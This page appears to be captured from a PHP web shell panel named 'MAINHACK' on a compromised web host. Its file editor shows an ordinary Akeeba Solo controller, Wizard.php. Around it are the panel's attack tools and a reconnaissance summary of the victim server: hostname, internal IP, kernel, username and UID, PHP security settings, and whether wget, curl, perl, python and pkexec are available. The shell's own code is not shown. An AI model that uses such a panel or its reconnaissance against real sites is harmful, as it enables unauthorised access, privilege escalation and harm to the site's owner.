[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Wizard.php
<?php /** * @package solo * @copyright Copyright (c)2014-2026 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ namespace Solo\Controller; use Awf\Container\Container; use Awf\Text\Language; /** * The Configuration Wizard controller */ class Wizard extends ControllerDefault { private bool $noFlush = false; public function __construct(?Container $container = null, ?Language $language = null) { parent::__construct($container, $language); $this->noFlush = $this->container->appConfig->get('no_flush', 0); } /** * Executes a given controller task. The onBefore<task> and onAfter<task> * methods are called automatically if they exist. * * @param string $task The task to execute, e.g. "browse" * * @return null|bool False on execution failure * * @throws \Exception When the task is not found */ public function execute($task) { // If we are running inside another CMS skip the first page $inCMS = $this->container->segment->get('insideCMS', false); if ($inCMS && !in_array($task, array('wizard', 'ajax'))) { $task = 'wizard'; } return parent::execute($task); } /** * Tests and saves the site configuration settings, then redirects to the wizard task */ public function applySiteSettings() { $this->csrfProtection(); $siteParams = $this->input->get('var', array(), 'array'); try { /** @var \Solo\Model\Wizard $model */ $model = $this->getModel(); $model->testSiteParams($siteParams); $model->saveSiteParams($siteParams); } catch (\Exception $e) { $url = $this->container->router->route('index.php?view=wizard'); $this->setRedirect($url, $e->getMessage(), 'error'); return; } $url = $this->container->router->route('index.php?view=wizard&task=wizard'); $this->setRedirect($url); } /** * Show the main page of the wizard * * @return void */ public function wizard() { $this->getView()->setLayout('wizard'); $this->display(); } public function ajax() { $act = $this->input->getCmd('akact', ''); /** @var \Solo\Model\Wizard $model */ $model = $this->getModel(); $model->setState('act', $act); $ret = $model->runAjax(); @ob_end_clean(); echo '#"\#\"#' . json_encode( $ret ) . '#"\#\"#'; if (!$this->noFlush) { flush(); } $this->container->application->close(); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697